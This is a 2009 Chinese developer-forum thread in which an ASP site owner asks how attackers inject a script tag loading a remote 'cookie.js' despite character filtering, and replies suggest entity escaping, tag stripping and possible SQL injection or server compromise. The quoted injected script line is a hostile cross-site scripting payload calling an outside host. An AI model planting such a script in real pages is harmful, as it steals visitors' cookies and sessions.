21,890
社区成员
发帖
与我相关
我的任务
分享100分求高手稍微指点一下
我的网站form表单执行过滤的字符串有(网站程序是asp的):
<>&" 空格
但有好多的黑客可以插入类似这样的代码到我的网站:
<script src="http://3dyuce.org/cookie.js"></script>
请问他们是如何做到的,我应当如何屏蔽?谢谢
<>&" 空格
但有好多的黑客可以插入类似这样的代码到我的网站:
<script src="http://3dyuce.org/cookie.js"></script>
请问他们是如何做到的,我应当如何屏蔽?谢谢
...全文
请发表友善的回复…
发表回复
zljsrc 2009-09-07
- 打赏
- 举报
可以试试提交时用JS转义成HTML字符,如: 空格-"' "
yctin 2009-09-07
- 打赏
- 举报
asp 怎么跑到 php 来问了
fxs_2008 2009-09-07
- 打赏
- 举报
第一:所有<>之类的字符保存时转义成实体
第二:有限度度允许用户使用编辑器
或后台过滤src之类的信息
第二:有限度度允许用户使用编辑器
或后台过滤src之类的信息
jiestyle 2009-09-07
- 打赏
- 举报
学习了.,
猫已经找不回了 2009-09-07
- 打赏
- 举报
去asp问吧,,
mlsml 2009-09-07
- 打赏
- 举报
用strip_tags()函数过滤html代码,并且可以规定输入框的maxlength大小
LutzMark 2009-09-07
- 打赏
- 举报
一般是被SQL注入了
或者是服务器有漏洞,被挂马后干的
或者是服务器有漏洞,被挂马后干的
wxq4100798 2009-09-07
- 打赏
- 举报
chr注入
或服务器漏洞
或服务器漏洞
babysc1 2009-09-07
- 打赏
- 举报
JS转译一下吧
可能是FORM提交的
可能是FORM提交的
phpboy 2009-09-07
- 打赏
- 举报
去 asp 问问看
foolbirdflyfirst 2009-09-07
- 打赏
- 举报
服务器给攻击了吧?
heblys 2009-09-07
- 打赏
- 举报
学习一下!
dahaidao 2009-09-07
- 打赏
- 举报
如果你转了,应该不是从你的form提交上来的。
